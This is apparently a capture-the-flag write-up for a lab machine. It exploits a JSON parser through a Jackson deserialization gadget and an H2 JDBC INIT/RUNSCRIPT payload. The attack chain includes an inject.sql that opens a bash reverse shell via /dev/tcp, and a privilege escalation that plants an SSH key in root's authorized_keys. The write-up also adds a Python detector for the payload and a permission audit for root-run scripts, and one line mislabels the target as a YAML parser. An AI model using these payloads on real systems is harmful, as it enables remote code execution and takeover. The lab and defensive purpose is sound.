Service overview

$ nmap -sV -sC -Pn -oN 10.10.10.214 10.10.10.214

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

Looks like the Ophiuchi yaml parser. Let's feed a long string into the parser:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'asdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdf...': was expecting ('true', 'false' or 'null')

Payload (the exception above names Jackson; the body below uses its array-wrapped polymorphic form with the logback DriverManagerConnectionSource gadget, and the H2 JDBC URL's INIT clause makes H2 fetch and run a script over HTTP):

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.138/inject.sql'"}]

inject.sql:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('/bin/bash -i >& /dev/tcp/10.10.14.138/1234 0>&1');

Listener:

nc -lnvp 1234

Send the payload.
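From the defender's side, the request body above has a very recognisable shape: a two-element JSON array whose first element is a fully qualified class name (Jackson's default-typing "wrapper array" form), a property bag naming a known gadget class, and a JDBC URL carrying an INIT= clause with RUNSCRIPT FROM. The detector below is an added example, not code from the write-up or from the target application; the gadget list holds only the class seen on this page, and the sample bodies are constructed. It flags all three signals independently, so a request that uses an unfamiliar gadget class or a different JDBC driver still produces a finding.

```python
import json
import re
from typing import List

# Gadget classes to treat as an immediate alert. Only the one used on this
# page is listed; a real deployment would carry a longer, maintained list.
KNOWN_GADGET_CLASSES = {
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
}

# A JDBC URL whose parameter section contains an INIT= clause (H2 executes it
# on connect), and the RUNSCRIPT FROM statement that pulls SQL from a location.
JDBC_INIT_RE = re.compile(r"jdbc:[^;\"']*;.*?\bINIT\s*=", re.IGNORECASE)
RUNSCRIPT_RE = re.compile(r"\bRUNSCRIPT\s+FROM\b", re.IGNORECASE)


def looks_like_wrapper_array(value) -> bool:
    """Jackson WRAPPER_ARRAY typing: ["fully.qualified.Class", {properties}]."""
    return (isinstance(value, list) and len(value) == 2
            and isinstance(value[0], str) and "." in value[0]
            and isinstance(value[1], dict))


def iter_strings(value):
    """Yield every string (keys and values) anywhere in a parsed JSON document."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield k
            yield from iter_strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from iter_strings(v)


def analyse_body(body: str) -> List[str]:
    """Return a list of findings for one request body; empty means nothing suspicious."""
    findings: List[str] = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings  # not JSON: this check has nothing to say

    # Walk the whole document so nested wrapper arrays are caught too.
    stack = [doc]
    while stack:
        node = stack.pop()
        if looks_like_wrapper_array(node):
            cls = node[0]
            if cls in KNOWN_GADGET_CLASSES:
                findings.append(f"known gadget class: {cls}")
            else:
                findings.append(f"polymorphic wrapper array naming class {cls}")
        if isinstance(node, dict):
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)

    for s in iter_strings(doc):
        if JDBC_INIT_RE.search(s):
            findings.append("JDBC URL with INIT= clause")
        if RUNSCRIPT_RE.search(s):
            findings.append("RUNSCRIPT FROM in JDBC URL/SQL")
    return findings


# Constructed sample bodies: the page's payload, a benign document, and an
# unknown class in wrapper-array form (the remote host/path are placeholders).
SAMPLE_BODIES = {
    "page_payload": '["ch.qos.logback.core.db.DriverManagerConnectionSource", '
                    '{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
                    'INIT=RUNSCRIPT FROM \'http://ATTACKER_HOST/inject.sql\'"}]',
    "benign": '{"user": "alice", "tags": ["a", "b"]}',
    "unknown_class": '{"settings": ["com.example.SomeBean", {"x": 1}]}',
}


def scan_samples() -> dict:
    return {name: analyse_body(body) for name, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for name, found in scan_samples().items():
        print(name, "->", found or "clean")
```

The application-side fix is not a regex: a Jackson ObjectMapper should not have default typing enabled, or, where polymorphism is genuinely needed, should use activateDefaultTyping with a BasicPolymorphicTypeValidator allow-list of the application's own base types so that arbitrary class names in the input are rejected before any constructor runs.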

User flag

pericles@time:/home/pericles$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:c7:ce brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.214/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:c7ce/64 scope global dynamic mngtmpaddr
       valid_lft 86060sec preferred_lft 14060sec
    inet6 fe80::250:56ff:feb9:c7ce/64 scope link
       valid_lft forever preferred_lft forever
pericles@time:/home/pericles$ cat user.txt
ee56cb90323df2dd8918e74af9f1fa26

PSpy

We see a script that performs a backup into the /root/ directory:

/usr/bin/timer_backup.sh

pericles owns this file, so we modify it (adding our ssh key):

$ nano /usr/bin/timer_backup.sh
echo "ssh-rsa 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 kali@kalihackthebox" > /root/.ssh/authorized_keys
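The privilege escalation works only because a script executed by root is owned by, and therefore writable by, an ordinary user. The audit below is an added example rather than anything from the write-up: given the path of a script that root runs (from a cron entry or a systemd timer's service unit), it reports whether the file or its parent directory could be modified by an unprivileged account. The constructed demo creates a throw-away copy of a backup script in a temporary directory; the script name and contents are made up for the demonstration.

```python
import os
import stat
import tempfile
from typing import List


def assess(owner_uid: int, mode: int, trusted_uids=(0,)) -> List[str]:
    """Reasons a root-executed file could be changed by an unprivileged user.

    Pure function over ownership and mode bits so it can be unit-tested
    without touching the filesystem.
    """
    reasons: List[str] = []
    if owner_uid not in trusted_uids:
        reasons.append(f"owned by uid {owner_uid}, not root")
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_script(path: str) -> List[str]:
    """Check the script itself and its parent directory.

    A writable parent directory lets the file be replaced outright, so it is
    reported too, except for the /tmp-style case of a world-writable sticky
    directory, where other users cannot rename or delete files they do not own.
    """
    st = os.stat(path)
    reasons = assess(st.st_uid, st.st_mode)

    parent_path = os.path.dirname(os.path.abspath(path))
    parent = os.stat(parent_path)
    parent_reasons = assess(parent.st_uid, parent.st_mode)
    if parent.st_mode & stat.S_ISVTX:
        parent_reasons = [r for r in parent_reasons if r != "world-writable"]
    reasons.extend(f"parent directory {r}" for r in parent_reasons)
    return reasons


def demo() -> List[str]:
    """Constructed case: a user-owned, world-writable backup script."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "timer_backup.sh")  # placeholder name for the demo
    with open(p, "w") as f:
        f.write("#!/bin/sh\n# placeholder backup command\n")
    os.chmod(p, 0o777)
    return audit_script(p)


if __name__ == "__main__":
    for reason in demo():
        print("FINDING:", reason)
```

The inputs to feed this in practice are the command lines from /etc/crontab, /etc/cron.d and root's crontab, and the ExecStart lines of the services behind `systemctl list-timers`; a script that root executes on a schedule should be owned by root and writable by nobody else, which is exactly the condition that fails on this box.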

Wait a bit and log in:

Root flag

root@time:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:c7:ce brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.214/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:c7ce/64 scope global dynamic mngtmpaddr
       valid_lft 86286sec preferred_lft 14286sec
    inet6 fe80::250:56ff:feb9:c7ce/64 scope link
       valid_lft forever preferred_lft forever
root@time:~# cat root.txt
dfb888b09df82c72f0c74b0377858c9f